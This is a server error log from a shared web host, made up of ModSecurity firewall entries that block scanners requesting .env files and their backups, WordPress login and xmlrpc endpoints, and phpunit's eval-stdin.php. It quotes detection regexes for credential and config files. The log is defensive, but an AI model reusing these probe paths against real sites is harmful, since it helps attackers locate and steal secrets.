[Tue May 26 14:39:58.864899 2026] [proxy_http:error] [pid 626747:tid 626931] [client 208.84.100.238:56470] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.865102 2026] [proxy:error] [pid 626747:tid 626899] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.865119 2026] [security2:error] [pid 626747:tid 626886] [client 208.84.100.238:56304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.bak"] [unique_id "ahVjZhVF8Qmdmw_OMfIObQAAARM"]
[Tue May 26 14:39:58.865139 2026] [proxy_http:error] [pid 626747:tid 626899] [client 208.84.100.238:56314] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.865237 2026] [proxy:error] [pid 626747:tid 626982] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.865278 2026] [proxy_http:error] [pid 626747:tid 626982] [client 208.84.100.238:56316] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.865409 2026] [proxy:error] [pid 626747:tid 626975] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.865448 2026] [proxy_http:error] [pid 626747:tid 626975] [client 208.84.100.238:56338] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.865656 2026] [security2:error] [pid 626747:tid 626889] [client 208.84.100.238:56366] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.orig"] [unique_id "ahVjZhVF8Qmdmw_OMfIObAAAARY"]
[Tue May 26 14:39:58.865668 2026] [security2:error] [pid 626747:tid 626955] [client 208.84.100.238:56360] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.swp"] [unique_id "ahVjZhVF8Qmdmw_OMfIOcAAAAVg"]
[Tue May 26 14:39:58.865945 2026] [proxy:error] [pid 626747:tid 626982] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.865990 2026] [proxy_http:error] [pid 626747:tid 626982] [client 208.84.100.238:56316] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.866661 2026] [security2:error] [pid 626747:tid 626997] [client 208.84.100.238:56488] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.swp"] [unique_id "ahVjZhVF8Qmdmw_OMfIOaQAAAYI"]
[Tue May 26 14:39:58.867178 2026] [proxy:error] [pid 626747:tid 626961] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.867271 2026] [proxy_http:error] [pid 626747:tid 626961] [client 208.84.100.238:56012] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.867443 2026] [security2:error] [pid 626747:tid 626930] [client 208.84.100.238:56422] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local~"] [unique_id "ahVjZhVF8Qmdmw_OMfIOYQAAAT8"]
[Tue May 26 14:39:58.867484 2026] [security2:error] [pid 626747:tid 626879] [client 208.84.100.238:56380] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.copy"] [unique_id "ahVjZhVF8Qmdmw_OMfIOcwAAAQw"]
[Tue May 26 14:39:58.867506 2026] [security2:error] [pid 626747:tid 626934] [client 208.84.100.238:56334] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.backup"] [unique_id "ahVjZhVF8Qmdmw_OMfIOcQAAAUM"]
[Tue May 26 14:39:58.867958 2026] [proxy:error] [pid 626747:tid 626961] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.868038 2026] [proxy_http:error] [pid 626747:tid 626961] [client 208.84.100.238:56012] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.868340 2026] [security2:error] [pid 626747:tid 626985] [client 208.84.100.238:56332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.old"] [unique_id "ahVjZhVF8Qmdmw_OMfIOcgAAAXY"]
[Tue May 26 14:39:58.869838 2026] [proxy:error] [pid 626747:tid 626938] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.869874 2026] [proxy_http:error] [pid 626747:tid 626938] [client 208.84.100.238:56292] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.870444 2026] [proxy:error] [pid 626747:tid 626938] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.870775 2026] [proxy_http:error] [pid 626747:tid 626938] [client 208.84.100.238:56292] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.888453 2026] [security2:error] [pid 626747:tid 626999] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjZhVF8Qmdmw_OMfIOUAAAAYQ"]
[Tue May 26 14:39:59.150767 2026] [proxy:error] [pid 626747:tid 626952] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:59.150835 2026] [proxy_http:error] [pid 626747:tid 626952] [client 208.84.100.238:56334] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:59.151422 2026] [proxy:error] [pid 626747:tid 626952] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:59.151454 2026] [proxy_http:error] [pid 626747:tid 626952] [client 208.84.100.238:56334] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:59.619052 2026] [security2:error] [pid 626747:tid 626907] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjZxVF8Qmdmw_OMfIOhQAAASg"]
[Tue May 26 14:40:00.447554 2026] [security2:error] [pid 626747:tid 626833] [remote 216.73.216.30:21473] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "support.mosykay.com"] [uri "/logo.php"] [unique_id "ahVjaBVF8Qmdmw_OMfIOpAABiVU"]
[Tue May 26 14:40:00.859659 2026] [security2:error] [pid 626747:tid 626776] [remote 216.73.216.30:21473] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "support.mosykay.com"] [uri "/index.php"] [unique_id "ahVjaBVF8Qmdmw_OMfIOtwABLBw"]
[Tue May 26 14:40:02.266709 2026] [security2:error] [pid 626747:tid 626970] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjaRVF8Qmdmw_OMfIO1gAAAWc"]
[Tue May 26 14:40:04.004115 2026] [security2:error] [pid 626747:tid 626891] [client 202.141.83.254:53996] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjbBVF8Qmdmw_OMfIPHAAAARg"]
[Tue May 26 14:40:04.005741 2026] [security2:error] [pid 626747:tid 626891] [client 202.141.83.254:53996] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjbBVF8Qmdmw_OMfIPHAAAARg"]
[Tue May 26 14:40:04.288299 2026] [security2:error] [pid 626747:tid 626955] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjaxVF8Qmdmw_OMfIPGwAAAVg"]
[Tue May 26 14:40:06.281315 2026] [security2:error] [pid 626747:tid 626973] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjbRVF8Qmdmw_OMfIPWAAAAWo"]
[Tue May 26 14:40:07.237645 2026] [security2:error] [pid 626747:tid 626847] [remote 57.141.2.2:34996] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.chettinadavenue.com"] [uri "/chettinad-rooms.php"] [unique_id "ahVjbxVF8Qmdmw_OMfIPcQABhGM"]
[Tue May 26 14:40:08.323572 2026] [security2:error] [pid 626747:tid 626992] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjbxVF8Qmdmw_OMfIPiQAAAX0"]
[Tue May 26 14:40:10.534501 2026] [security2:error] [pid 626747:tid 626938] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjchVF8Qmdmw_OMfIPrQAAAUc"]
[Tue May 26 14:40:11.782604 2026] [security2:error] [pid 626747:tid 626919] [client 85.208.96.201:62904] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVjcxVF8Qmdmw_OMfIP6wAAATQ"]
[Tue May 26 14:40:11.782754 2026] [security2:error] [pid 626747:tid 626919] [client 85.208.96.201:62904] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVjcxVF8Qmdmw_OMfIP6wAAATQ"]
[Tue May 26 14:40:13.304868 2026] [security2:error] [pid 626747:tid 626899] [client 185.255.126.41:53105] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "toronto121mortgage.com"] [uri "/process.php"] [unique_id "ahVjdRVF8Qmdmw_OMfIQDAAAASA"], referer: http://toronto121mortgage.com/index.php
[Tue May 26 14:40:13.844463 2026] [security2:error] [pid 626747:tid 626901] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjdRVF8Qmdmw_OMfIQGAAAASI"]
[Tue May 26 14:40:14.393466 2026] [security2:error] [pid 626747:tid 626948] [client 202.141.83.254:19800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjdhVF8Qmdmw_OMfIQNgAAAVE"]
[Tue May 26 14:40:14.393576 2026] [security2:error] [pid 626747:tid 626948] [client 202.141.83.254:19800] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjdhVF8Qmdmw_OMfIQNgAAAVE"]
[Tue May 26 14:40:14.820658 2026] [security2:error] [pid 626747:tid 626917] [client 47.128.61.194:57862] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.karuppuswamykovil.in"] [uri "/robots.txt"] [unique_id "ahVjdhVF8Qmdmw_OMfIQRAAAATI"]
[Tue May 26 14:40:15.268103 2026] [security2:error] [pid 626747:tid 626920] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjdhVF8Qmdmw_OMfIQSAAAATU"]
[Tue May 26 14:40:15.390485 2026] [security2:error] [pid 626747:tid 626908] [client 89.221.206.108:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjdxVF8Qmdmw_OMfIQWwAAASk"], referer: https://anujtradingco.com
[Tue May 26 14:40:15.969757 2026] [security2:error] [pid 626747:tid 626867] [remote 101.99.50.238:51240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.50.99.101.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVjdxVF8Qmdmw_OMfIQZwABenc"]
[Tue May 26 14:40:16.176696 2026] [http2:info] [pid 636820:tid 636820] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 14:40:16.770363 2026] [security2:error] [pid 636820:tid 636959] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjeK_r6oOphPch7B9v4QAAAAk"]
[Tue May 26 14:40:16.843028 2026] [security2:error] [pid 636820:tid 636984] [client 108.136.162.67:57635] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/.env"] [unique_id "ahVjeK_r6oOphPch7B9v9QAAACI"]
[Tue May 26 14:40:17.184937 2026] [security2:error] [pid 636820:tid 637029] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjea_r6oOphPch7B9wCgAAAE8"]
[Tue May 26 14:40:17.742751 2026] [security2:error] [pid 636820:tid 637069] [client 108.136.162.67:57635] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/laravel/.env"] [unique_id "ahVjea_r6oOphPch7B9wHwAAAHc"]
[Tue May 26 14:40:18.006912 2026] [security2:error] [pid 636820:tid 636965] [client 108.136.162.67:57635] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/api/.env"] [unique_id "ahVjeq_r6oOphPch7B9wKQAAAA8"]
[Tue May 26 14:40:18.274854 2026] [security2:error] [pid 636820:tid 636983] [client 108.136.162.67:57635] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/backend/.env"] [unique_id "ahVjeq_r6oOphPch7B9wLQAAACE"]
[Tue May 26 14:40:18.436213 2026] [security2:error] [pid 636820:tid 636955] [client 176.65.139.237:23928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "new.wrapmachines.com"] [uri "/.env"] [unique_id "ahVjeq_r6oOphPch7B9wMQAAAAU"]
[Tue May 26 14:40:18.539512 2026] [security2:error] [pid 636820:tid 636997] [client 108.136.162.67:57635] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/public/.env"] [unique_id "ahVjeq_r6oOphPch7B9wPQAAAC8"]
[Tue May 26 14:40:18.604353 2026] [security2:error] [pid 636820:tid 636967] [client 34.63.117.220:6208] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVjeq_r6oOphPch7B9wOAAAEXA"]
[Tue May 26 14:40:18.815727 2026] [security2:error] [pid 636820:tid 636975] [client 108.136.162.67:57635] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/server/.env"] [unique_id "ahVjeq_r6oOphPch7B9wSQAAABk"]
[Tue May 26 14:40:18.871410 2026] [security2:error] [pid 636820:tid 636987] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjeq_r6oOphPch7B9wMAAAACU"]
[Tue May 26 14:40:18.885466 2026] [security2:error] [pid 636820:tid 636972] [client 34.63.117.220:6208] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVjeq_r6oOphPch7B9wRQAAFnE"]
[Tue May 26 14:40:19.086164 2026] [security2:error] [pid 636820:tid 637022] [client 108.136.162.67:57635] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/core/.env"] [unique_id "ahVje6_r6oOphPch7B9wTAAAAEg"]
[Tue May 26 14:40:19.352333 2026] [security2:error] [pid 636820:tid 637020] [client 108.136.162.67:57635] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/config/.env"] [unique_id "ahVje6_r6oOphPch7B9wVQAAAEY"]
[Tue May 26 14:40:19.626397 2026] [security2:error] [pid 636820:tid 637063] [client 108.136.162.67:57635] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/app/.env"] [unique_id "ahVje6_r6oOphPch7B9wYwAAAHE"]
[Tue May 26 14:40:19.948312 2026] [security2:error] [pid 636820:tid 637052] [client 108.136.162.67:57635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVje6_r6oOphPch7B9wZwAAAGY"]
